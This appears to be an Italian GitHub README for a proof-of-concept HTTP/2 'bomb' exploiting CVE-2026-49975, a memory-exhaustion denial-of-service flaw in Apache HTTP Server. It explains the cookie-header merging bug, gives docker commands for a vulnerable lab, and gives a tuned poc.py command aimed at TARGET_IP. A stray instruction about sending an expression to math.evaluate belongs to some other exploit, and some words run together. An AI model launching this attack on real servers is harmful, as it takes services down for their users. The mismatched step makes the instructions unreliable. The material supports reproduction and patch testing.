
HTTP/2 Bomb
★ CVE-2026-49975 Bomba HTTP/2 PoC ★
https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74
CVE-2026-49975 è una vulnerabilità di Denial of Service (DoS) in Apache HTTP Server. La vulnerabilità si verifica nel percorso di gestione delle richieste HTTP/2, dove più campi di intestazione
cookiepossono essere fusi senza essere conteggiati correttamente rispetto aLimitRequestFields. Inviando una piccola richiesta HTTP/2 codificata HPACK che si espande in molti campi di intestazionecookie, un attaccante può forzare il server ad allocare ripetutamente memoria durante l'unione delle intestazioni Cookie. L'attaccante può quindi utilizzare il controllo di flusso HTTP/2 per ritardare la trasmissione della risposta, mantenendo aperti i flussi interessati e impedendo il rilascio della memoria allocata.
| Categoria | Versione |
|---|---|
| Vulnerabile | Apache HTTP Server 2.4.17 ≤ versione ≤ 2.4.67 |
| Corretto | Apache HTTP Server 2.4.68 o successivo |
Crea ed esegui l'ambiente vulnerabile di Apache HTTP Server.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
Dopo aver avviato l'ambiente vulnerabile, segui i passaggi seguenti per riprodurre l'attacco.
docker stats cve-2026-49975
Esempio di output:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
Invia la seguente espressione a math.evaluate (ad esempio, tramite l'input di calcolo dell'applicazione).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
Verifica che l'utilizzo della memoria del container Apache aumenti e rimanga elevato mentre i flussi di attacco sono mantenuti aperti.